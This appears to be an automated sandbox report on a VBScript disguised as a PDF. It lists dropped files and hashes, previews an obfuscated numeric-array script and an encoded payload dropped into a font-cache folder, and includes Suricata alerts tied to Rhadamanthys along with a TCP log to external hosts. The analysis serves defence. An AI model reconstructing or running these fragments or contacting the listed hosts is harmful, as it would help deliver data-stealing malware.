                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vhrbgtv.3un.ps1

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a04qrmx5.l4s.psm1

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxjhzpmv.0an.ps1

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opbudj40.rue.ps1

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztlrokok.em3.psm1

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Exultet.Bid

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):414812
                                                                                                                                                                                      Entropy (8bit):5.950098047006729
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:oNVXWQ1a+Rstm/8JzQqaAJoHrbRTC1fse:oz31aNh1aAC301f
                                                                                                                                                                                      MD5:1C8EEA62BA17FC6DBA580BF2838B9E5A
                                                                                                                                                                                      SHA1:10E1F0E026961DA89F7B08FF213EF5DAAF6D14BC
                                                                                                                                                                                      SHA-256:1B924838E7940222DCC7E76C15139882D57D0C0A3F3E8D14BA5C370EA5C8708F
                                                                                                                                                                                      SHA-512:50BD7E47E553264C1E22B50BD6715C371BD40ACDDE41FD829F180956AA64F851F1BECC83921EF4D65F07C87690BF0BF14ADA285A71F4D241ED62FF674EA26526
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:cQGb6wKoA7tdOBoA6wK7UHEBmwNcJARxAZtxAZu5hNo50XEBm3EBm4HxoVnWL3EBm3EBm4HB23wQAXEBm3EBm3EBm3EBm7qua4g/6wJnBesCNffrAhT7cQGbMcpxAZvrAkIwiRQLcQGbcQGb0eJxAZtxAZuDwQTrAgxV6wIVJ4H5Y/qcAHzMcQGb6wJPZ4tEJARxAZtxAZuJw3EBm3EBm4HDovs6AOsCAPJxAZu6d2cjGusCkOtxAZuB6iW6e0XrAh2ycQGbgfJSrafU6wKyW3EBm3EBm+sCeAxxAZvrAlstiwwQcQGb6wKipIkME3EBm3EBm0LrAsOc6wKQj4H6kFIEAHXVcQGb6wJRwolcJAzrAiPicQGbge0AAwAA6wIDzusCRsqLVCQI6wLU3XEBm4t8JARxAZvrAkK6ievrArvecQGbgcOcAAAA6wLvAusC4m1TcQGbcQGbakDrAjSLcQGbietxAZtxAZvHgwABAAAAQLoAcQGb6wK3WYHDAAEAAHEBm3EBm1NxAZvrAtOqievrAktVcQGbibsEAQAA6wJPdnEBm4HDBAEAAHEBm3EBm1NxAZtxAZtq/3EBm+sC0eeDwgVxAZtxAZsx9usCQMJxAZsxyXEBm+sCba2LGusCDqXrAmmIQXEBm3EBmzkcCnX0cQGb6wLVDEbrAlC56wKJn4B8Cvu4dd3rAqtXcQGbi0QK/OsCqKRxAZsp8OsCcbDrAjRw/9JxAZvrAvBwupBSBADrAmOwcQGbMcBxAZvrApaoi3wkDHEBm+sCbsuBNAciI1JEcQGbcQGbg8AEcQGbcQGbOdB15usCCnxxAZuJ+3EBm+sCf+r/13EBm3EBm8ogUkQiRWuHeRqCzcfkF4XSTqgZo1aT3fntY8VX4prAfxDTKeOCfS19b60J41aoEavG6ybQZMHE3IdqnqPS5873ftOFe315nqbe04XKCxATpt6VAC8jDpbyUdMoLyPRwIfZ0r9soj5JIkYxLQyi

                                                                                                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):55
                                                                                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                      Static File Info

                                                                                                                                                                                      General

                                                                                                                                                                                      File type:ASCII text, with very long lines (2731), with CRLF line terminators
                                                                                                                                                                                      Entropy (8bit):3.4463315325303796
                                                                                                                                                                                      TrID:
                                                                                                                                                                                        File name:List of required items and services pdf.vbs
                                                                                                                                                                                        File size:3'001 bytes
                                                                                                                                                                                        MD5:32aabce75f3fd75d0ecf7743bc6b9aff
                                                                                                                                                                                        SHA1:0f715b1ceafeddd4c80b294e91ec476ae3e8c0d0
                                                                                                                                                                                        SHA256:21beb442551b46efbb7727a20784e6f047b4321dd3d8ccfca94c256b9ad6e0be
                                                                                                                                                                                        SHA512:4b97803a2fd41e6295bd8baba76cfc033e3d8170f334c94bd296783b852a70e87ed8d6d58596b20ee844909d03a812727e0ad204c6aea09a8cf3a25bdb2df00f
                                                                                                                                                                                        SSDEEP:48:TJafb+vKVySHj3lS+Dkh1SFFMS1SBc24LlSMBbuSBlSMCSwVERbuSBBUS1R+nK:W6KjIXGno0nuSb+K
                                                                                                                                                                                        TLSH:985176308BCE9AAAE75BDC595835023F85C45C3357BEEAC1AE629DEF1E8393054C58C1
                                                                                                                                                                                        File Content Preview:skjhatdtrpg = Array(1130, 1177, 1164, 1160, 1179, 1164, 1142, 1161, 1169, 1164, 1162, 1179, 1103, 1097, 1150, 1146, 1162, 1177, 1168, 1175, 1179, 1109, 1146, 1167, 1164, 1171, 1171, 1097, 1104, 1109, 1145, 1180, 1173, 1095, 1097, 1175, 1174, 1182, 1164, 1

                                                                                                                                                                                        File Icon

                                                                                                                                                                                        Icon Hash:68d69b8f86ab9a86

                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                        2024-12-09T18:48:54.714981+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449754202.71.109.228443TCP
                                                                                                                                                                                        2024-12-09T18:49:03.127556+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.1412023192.168.2.449765TCP
                                                                                                                                                                                        2024-12-09T18:49:25.421624+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.1412023192.168.2.449815TCP
                                                                                                                                                                                        2024-12-09T18:49:25.421624+01002854824ETPRO JA3 HASH Suspected Malware Related Response245.149.241.1412023192.168.2.449815TCP
                                                                                                                                                                                        2024-12-09T18:49:37.348409+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.1412023192.168.2.449845TCP
                                                                                                                                                                                        2024-12-09T18:49:37.348409+01002854824ETPRO JA3 HASH Suspected Malware Related Response245.149.241.1412023192.168.2.449845TCP
                                                                                                                                                                                        2024-12-09T18:49:47.320448+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.141443192.168.2.449870TCP
                                                                                                                                                                                        2024-12-09T18:49:54.479011+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.141443192.168.2.449885TCP
                                                                                                                                                                                        2024-12-09T18:50:01.654660+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.141443192.168.2.449903TCP
                                                                                                                                                                                        2024-12-09T18:50:08.956237+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.141443192.168.2.449920TCP
                                                                                                                                                                                        2024-12-09T18:50:16.042796+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.141443192.168.2.449938TCP

                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Dec 9, 2024 18:48:00.838766098 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:00.838812113 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:00.838881016 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:00.849808931 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:00.849823952 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.222054958 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.222130060 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:02.297857046 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:02.297894955 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.298212051 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.343209028 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:02.347584009 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:02.391364098 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.748061895 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.793956041 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:02.793973923 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.840831995 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:02.872458935 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.872468948 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.872508049 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.872520924 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.872533083 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:02.872549057 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.872581005 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:02.872581005 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.872607946 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:02.918945074 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:02.982683897 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.982707977 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.982749939 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.982759953 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.982769966 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.982781887 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.982795954 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:02.982852936 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:02.982866049 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.982880116 CET44349730209.124.66.28192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:02.982925892 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:02.994707108 CET49730443192.168.2.4209.124.66.28
                                                                                                                                                                                        Dec 9, 2024 18:48:08.798628092 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:08.798669100 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:08.798764944 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:08.801053047 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:08.801063061 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:10.726334095 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:10.726411104 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:10.731113911 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:10.731121063 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:10.731337070 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:10.737492085 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:10.783340931 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:11.573956966 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:11.573982000 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:11.574048996 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:11.574064970 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:11.622253895 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:11.823301077 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:11.823319912 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:11.823448896 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:11.848921061 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:11.848932028 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:11.849035025 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:11.874197960 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:11.874310017 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.077131987 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.077372074 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.097069979 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.097191095 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.115789890 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.115875006 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.134174109 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.134370089 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.152496099 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.152570963 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.176754951 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.176841021 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.196701050 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.196779013 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.338761091 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.338845015 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.345010996 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.345089912 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.351439953 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.351536989 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.357537985 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.357610941 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.365556955 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.365655899 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.371927977 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.371994019 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.378137112 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.378221989 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.384526968 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.384615898 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.392466068 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.392533064 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.399020910 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.399106026 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.405936003 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.406008005 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.458501101 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.458617926 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.532069921 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.532248020 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.538640022 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.538714886 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.598809958 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.598989964 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.602123022 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.602195024 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.606698036 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.606784105 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.610192060 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.610275984 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.613816023 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.613884926 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.618058920 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.618134022 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.621619940 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.621714115 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.625138044 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.625212908 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.628880024 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.628954887 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.633028984 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.633107901 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.636192083 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.636256933 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.640583992 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.640671015 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.644150972 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.644246101 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.647696018 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.647794962 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.652273893 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.652371883 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.723630905 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.723784924 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.728117943 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.728204012 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.791002035 CET44349732103.53.42.63192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:12.791132927 CET49732443192.168.2.4103.53.42.63
                                                                                                                                                                                        Dec 9, 2024 18:48:12.793555975 CET44349732103.53.42.63192.168.2.4
